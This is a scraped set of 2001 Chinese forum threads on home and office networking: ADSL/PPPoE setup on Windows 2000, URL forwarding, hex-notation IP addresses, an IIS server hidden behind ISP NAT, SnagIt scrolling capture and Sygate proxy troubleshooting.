菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-12-17 20:38:55 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
不行。出错。
“您无权查看该网页。”

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

嘿嘿

坏笑
积分：403
发帖：525
来自：
注册：2001-10-06
 发表于 2001-12-18 10:57:58 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
好象不行，有些服务商所谓的域名指向只是把你所有指向的页面放到一个frame里，当别人键入你的网址的时候其实只是连到了那个frame，所以即使在后面再加具体文件的访问路径也是不能访问的，好象万网的域名指向就是这样，不知道是不是你所说的。

缘是天定,份在人为.
len

SlowHorse
积分：1192
发帖：568
来自：hebei
注册：2001-09-29
 发表于 2001-12-18 14:32:15 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
嘿嘿在上个帖子中说
引用:
好象不行，有些服务商所谓的域名指向只是把你所有指向的页面放到一个frame里，当别人键入你的网址的时候其实只是连到了那个frame，所以即使在后面再加具体文件的访问路径也是不能访问的，好象万网的域名指向就是这样，不知道是不是你所说的。

没错，你的域名注册商那里的URL转向多半只是提供这样的服务。

Dripping water wears away a stone.
上一贴 | 下一贴
快速回复 | 主题：关于URL指向的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在WIN2000中如何连接ADSL吗？

计算机技术
在WIN2000中如何连接ADSL吗？

上一贴 | 下一贴
发表人 主题: 在WIN2000中如何连接ADSL吗？
zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-17 01:32:59 按此观看zslzsl的个人资料 按此发邮件给zslzsl 收藏该主题供以后查看 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
在WIN2000中如何连接ADSL吗？
是不是右键单击网上邻居，从弹出的窗口中右键单击本地连接，然后设置IP、网关、掩码、DNS等？
zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-17 10:14:08 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
top
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-17 21:56:55 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
IP不用了DNS都不用

一，装网卡
二，装协议PPPOE
三，PPPOE拨号SETUP
四，拨号

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-17 23:27:01 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
如何装协议PPPOE，是WIN2000自带吗？还是到哪里下载？？
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 00:29:17 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
电信的人干什么的？应该给你了
如果没有到站点去下
http://www.hz.zj.cn/PPPOE.ZIP

里面有协议和SETUP

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 00:31:17 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
先用添加协议，从该压缩文件解压缩后得到
然后重启后，用里面的RASPPPOE。EXE创建虚拟拨号程序

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-19 12:44:39 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
谢谢，我试试看。十分感谢！！！

另外，本地ADSL是专线的，而并不是虚拟拨号啊？？（详情看这里：http://202.101.106.25/adsl/3.htm）
专线真是的这样设置吗？？？

[这消息被zslzsl编辑过(编辑时间2001-12-19 12:45:13)]

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-19 16:07:40 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
top,兄弟，帮忙啊!!!!!!!
Bobofu

终级用户
积分：464
发帖：414
来自：北京
注册：2000-09-01
 发表于 2001-12-19 17:18:27 按此观看Bobofu的个人资料 按此发邮件给Bobofu Bobofu 的 oicq 是6376850,查看 6376850 的资料 发送悄悄话给Bobofu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Bobofu的IP
安装WinPoET ，重起，然后运之，输入你的ADSL用户名密码就行了

我这里就是这样搞定的，很简单呀

至于WinPoET 好多地方都有下，这里就不说了，呵呵

人生，充满取舍......
jdom

初级用户
积分：0
发帖：5
来自：上海
注册：2001-12-19
 发表于 2001-12-19 17:25:42 按此观看jdom的个人资料 按此发邮件给jdom 发送悄悄话给jdom 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jdom的IP
RASPPPOE

从明天起, 做一个幸福的人
喂马, 劈柴, 周游世界
从明天起, 关心粮食和蔬菜
我有一所房子, 面朝大海, 春暖花开

从明天起, 和每一个亲人通信
告诉他们我的幸福
那幸福的闪电告诉我的
我也将告诉每一个人

给每一条河每一座山取一个温暖的名字
陌生人, 我也为你祝福
愿你有一个灿烂的前程
愿你有情人终成眷属
愿你在尘世获得幸福
我也愿面朝大海, 春暖花开

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-19 20:07:20 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
Bobofu在上个帖子中说
引用:
安装WinPoET ，重起，然后运之，输入你的ADSL用户名密码就行了

我这里就是这样搞定的，很简单呀

至于WinPoET 好多地方都有下，这里就不说了，呵呵

我已经说过，我的ADSL是专业上网的，绝对不需要用户名和密码。
我想请教：专线上网的ADSL在WIN2000中如何设置(一进入WIN2000就一直与网络连接)？？

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-19 21:15:00 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
top
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-19 21:34:25 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
电话与Modem之间用一条两芯电话线连接，后是在ADSL Modem与计算机的网卡之间用
一条交叉网线连通即可完成硬件安装 ... 参数项设置好，就完成了整个安装工作

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-19 22:03:36 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
阿修罗飞天舞在上个帖子中说
引用:
电话与Modem之间用一条两芯电话线连接，后是在ADSL Modem与计算机的网卡之间用
一条交叉网线连通即可完成硬件安装 ... 参数项设置好，就完成了整个安装工作

硬件已经搞定，我在WIN98设置成功，但WIN2000的参数如何设置？？

假设以下情况：
IP：218.218.218.5
网关：218.218.218.10
掩码：255.255.255.25
DNS：200.200.200.35

阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-19 23:52:08 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
我自己不是专线，不过我觉得应该安装pppoe协议，，有没有安装好？？？

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

zslzsl

终级用户
积分：496
发帖：248
来自：福建漳浦
注册：2000-08-30
 发表于 2001-12-20 00:40:32 按此观看zslzsl的个人资料 按此发邮件给zslzsl 发送悄悄话给zslzsl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zslzsl的IP
那算了，我自己搞定吧。
阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-20 05:29:56 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
98里面如果已经搞定，那么2000应该也差不多啊！
tcp/ip协议里写上相应的ip地址，dns，掩码等等，不过我觉得，pppoe你肯定要装的啊！难道你没有安装吗？

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

上一贴 | 下一贴
快速回复 | 主题：在WIN2000中如何连接ADSL吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


0x3d.0x88.0x3f.0x28 这个ip好奇怪

计算机技术
0x3d.0x88.0x3f.0x28 这个ip好奇怪

上一贴 | 下一贴
发表人 主题: 0x3d.0x88.0x3f.0x28 这个ip好奇怪
wangq

硅基帝国中尉
积分：1694
发帖：997
来自：硅基帝国
注册：2000-11-18
 发表于 2001-12-19 09:35:16 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 收藏该主题供以后查看 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP
怎么连呢？！？！

http://wangq.myrice.com
#@%$#^@%&^#%

爱巢.鸟蛋
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-19 11:04:42 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
在哪里找到的这个IP？？它的显示是什么样子（你能排除是显示故障）？它出现在什么系统中？何时出现的？在出现前你做了什么？？

拜托！老兄，多给点线索，不然谁知道你在说什么?你的问题又是什么意思呢？？

上帝保佑！

打雷了！下雨了！大家快回家收衣服啊……
wangq

硅基帝国中尉
积分：1694
发帖：997
来自：硅基帝国
注册：2000-11-18
 发表于 2001-12-19 16:28:32 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP
一个软件下载基地的ip

想起来了 可能要转换成10进制

http://wangq.myrice.com
#@%$#^@%&^#%

爱巢.鸟蛋
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-19 16:45:25 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
这个是16进制的而已

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-12-19 19:23:01 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
竟然给无忌竟然蒙对了……

3d.88.3f.28 = 61.136.63.40

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-19 19:46:43 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
赵鹏在上个帖子中说
引用:
竟然给无忌竟然蒙对了……

3d.88.3f.28 = 61.136.63.40

靠，你才是蒙地！杀！杀！杀！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

上一贴 | 下一贴
快速回复 | 主题：0x3d.0x88.0x3f.0x28 这个ip好奇怪
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一个问题

计算机技术
一个问题

上一贴 | 下一贴
发表人 | 主题: 一个问题
早起的虫子 初级用户 积分：37 发帖：12 来自：山东 注册：2001-01-22 | 发表于 2001-12-19 18:17:59 按此观看早起的虫子的个人资料 按此发邮件给早起的虫子 早起的虫子 的 oicq 是161196,查看 161196 的资料 收藏该主题供以后查看 发送悄悄话给早起的虫子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看早起的虫子的IP 我这里是ADSL，有固定IP，我用的是windows2000server，想自己做个网站的， 可是现在有个问题很是困扰我，还请各位大哥帮帮忙啊！！ 我的机子IP是10.8.0.75，网关10.0.0.1 子网掩码是255.0.0.0 IIS默认目录是:\myweb d:\myweb\index.asp 现在的问题是在我的机子打上10.8.0.75能看到index.asp上的内容，在局域网内也能看 到 可是在别的地方却看不到，提示找不到服务器 各位帮下忙看看是什么原因呢？ 我怀疑是不是网关跟子网掩码有关呢？
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-19 19:10:50 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 10开头的 是电信局ATM内部IP 当你访问公网时 由ATM来映射内部IP为外部IP 相当于你现在也是处在一个局域网内 而不是直接连接公网 你可以向电信局机房询问公网IP转换情况 他们会告诉你你在公网上的IP 一般会类似202.xxx.xxx.75这样的 这样当别人用你的公网IP访问时 会先访问到你的ATM 再由ATM转换为内部IP 最后连接到你的电脑 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
张无忌 win1st 管理员 积分：7148 发帖：3108 来自：Blueidea.com 注册：2000-09-10 | 发表于 2001-12-19 19:55:45 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP 你的所谓固定ip只是内部网络的，并不是internet的！所以没用！ 只用一样东西，不明白它的道理，实在不高明 Blueidea Web Team Team Member
张无忌 win1st 管理员 积分：7148 发帖：3108 来自：Blueidea.com 注册：2000-09-10 | 发表于 2001-12-19 19:58:07 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP 可以黑掉电信局的服务器，然后设置IP映射，或静态路由。 置于怎么黑掉，请请教赵鹏。 只用一样东西，不明白它的道理，实在不高明 Blueidea Web Team Team Member
上一贴 | 下一贴
快速回复 | 主题：一个问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


用snagit6怎样完全抓取带滚屏的页面？？？

计算机技术
用snagit6怎样完全抓取带滚屏的页面？？？

上一贴 | 下一贴
发表人 | 主题: 用snagit6怎样完全抓取带滚屏的页面？？？
flash_sword 永不言败 积分：2304 发帖：619 来自：Guangdong,Ch 注册：2000-01-16 | 发表于 2001-12-28 00:19:00 flash_sword 的 oicq 是43104,查看 43104 的资料 收藏该主题供以后查看 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 第一次用snagit6,x想完全抓取带滚屏的页面，找不着北，请指教。 .::Great Minds Think Alike::.
tunco 终级用户 积分：555 发帖：209 来自： 注册：2000-08-12 | 发表于 2001-12-28 00:58:07 按此观看tunco的个人资料 按此发邮件给tunco tunco 的 oicq 是17710900,查看 17710900 的资料 发送悄悄话给tunco 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tunco的IP 你探索一下，原来有讨论的。特别是以前有些动画教程，很好的，我现在还不知道该怎么做，哪位知道的能否贴个详细教程，特别是赵鹏，在QQ上问一好几次也不吭声。 今天最后一次发贴，记住这个时间吧！2002.03.27
Tunco 终级用户 积分：555 发帖：209 来自： 注册：2000-08-12 | 发表于 2001-12-28 01:21:03 按此观看Tunco的个人资料 按此发邮件给Tunco Tunco 的 oicq 是17710900,查看 17710900 的资料 发送悄悄话给Tunco 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Tunco的IP 以前赵鹏贴的方法： －－－－－－－－－－－－－－－－－ 使用SnagIt 5就可以抓取滚动窗口 使用Image Capture模式 在Input菜单中选择Advanced->Custom Scroll 在抓屏开始之后先划出要抓取的区域 之后按动滚动条的向下或是向右按钮 会看到屏幕自动在滚动 滚动结束后将结果存盘即可 今天最后一次发贴，记住这个时间吧！2002.03.27
flash_sword 永不言败 积分：2304 发帖：619 来自：Guangdong,Ch 注册：2000-01-16 | 发表于 2001-12-28 08:54:17 flash_sword 的 oicq 是43104,查看 43104 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 已经找着北了，谢谢！ 不过我还是习惯使用hypersnap .::Great Minds Think Alike::.
上一贴 | 下一贴
快速回复 | 主题：用snagit6怎样完全抓取带滚屏的页面？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的代理服务器出了什么问题？？

计算机技术
我的代理服务器出了什么问题？？

上一贴 | 下一贴
发表人 主题: 我的代理服务器出了什么问题？？
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-18 11:44:23 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 收藏该主题供以后查看 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
公司内部网络系统是100M的局域网，差不多有40个终端用户，共用一台代理服务器通过ADSL连接外部网络。
代理服务器的使用的是sygate 3.11 完全版，有注册码，拨号软件时EnterNet 300，系统是2000。服务器上的域名解析DNS设置为当地的域名服务器，网络配置完全正常。客户端安装sygate的客户端版本，网关及DNS设置也完全正常。
可是我发现客户端上网时大多时间可以正常浏览，可对于几个大型网站如：新浪，搜狐，21CN等不能正常浏览，表现为超时，不能打开；可服务器浏览这些网站不会出现任何问题，这是为什么？？？
申明一点，不会存在网络不通畅的问题，而且这个问题不止出现在一个客户端，所有客户端都是如此，这是何故？？求救！！

打雷了！下雨了！大家快回家收衣服啊……
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-18 11:50:06 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
sygate的服务器端有没有设置什么限制~ 一般不会有这个问题，另外用win2000的话话推荐使用win2000自带的共享~~~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-18 12:05:59 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
我查过了，应该不存在任何版本限制的问题（听说没有注册的sygate会有终端使用数量的限制），可我找到的版本在其它网络里使用得很好，没有任何的问题。sygate在服务器端的设置里有网络的配置，不过我在系统中已经配置好了，所以这里我没有填写（实践证明也是正确的，因为访问大多数网站没有任何问题）。我就是觉得奇怪，不可能出现的现象我没办法解决啊！
我知道可以使用2000中的网络共享，不过公司马上要上一套OA系统，平台是NT，所以我必须在非2000的环境中正确解决这个问题，那么说sygate还是必须的。那么……我怎么解决？？

打雷了！下雨了！大家快回家收衣服啊……
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-18 12:09:28 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
AirTree在上个帖子中说
引用:
我查过了，应该不存在任何版本限制的问题（听说没有注册的sygate会有终端使用数量的限制），可我找到的版本在其它网络里使用得很好，没有任何的问题。sygate在服务器端的设置里有网络的配置，不过我在系统中已经配置好了，所以这里我没有填写（实践证明也是正确的，因为访问大多数网站没有任何问题）。我就是觉得奇怪，不可能出现的现象我没办法解决啊！
我知道可以使用2000中的网络共享，不过公司马上要上一套OA系统，平台是NT，所以我必须在非2000的环境中正确解决这个问题，那么说sygate还是必须的。那么……我怎么解决？？

以前正常过吗？

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-18 12:37:38 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
呵呵，没有，在公司网络重从来没有正常过，不知道什么原因！

打雷了！下雨了！大家快回家收衣服啊……
蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2001-12-18 14:16:57 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
internet共享也是有问题的，比如我和JIMBOB。JIMBOB就是始终上不了FLASHKIT网站。

表现能找到IP地址，排除DNS问题。
但就是服务器没有响应。看不到网站。而做为拨号服务的机器能够正常访问。

建议airtree试试 www.flashkit.com

我们怀疑是 ms的internet share有问题。

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-18 14:25:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
蓝色在上个帖子中说
引用:
internet共享也是有问题的，比如我和JIMBOB。JIMBOB就是始终上不了FLASHKIT网站。

表现能找到IP地址，排除DNS问题。
但就是服务器没有响应。看不到网站。而做为拨号服务的机器能够正常访问。

建议airtree试试 www.flashkit.com

我们怀疑是 ms的internet share有问题。

www.flashkit.com 我们共享的都能上~ 没有问题~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

阿修罗飞天舞

无关风月
现任版主
积分：2272
发帖：2263
来自：杭州
注册：2001-05-21
 发表于 2001-12-18 17:28:32 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
恩,单位也是这样,服务器连到其他的工作站上网.
服务器上网很正常
不过底下的机子就很可怕,需要不停地刷新

前两天把我的笔记本和台式机连,出现都可以PING通,但是就是看不到对方,而且也搜索不到,我差点晕死过去
DELL的人说是没有设置用户的缘故,废话,这个我还不知道么,
可是没有效果.
奇怪的事情是当我不知道重新启动了多少次数以后忽然正常了
想想我也是很胆小了,每做一点改动就重新启动一下.可恶.
也许是操作系统安装的问题.
IE5.5安装了N次,就是依然显示版本为5.0
害我怎么都装不上.NET,我哭
傻瓜的晕倒死2000,不过比98好点,至少我还能解决问题,终能解决
我决定装REDFLAG了,没办法,去尝试一下新的东西吧,也许会好点

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
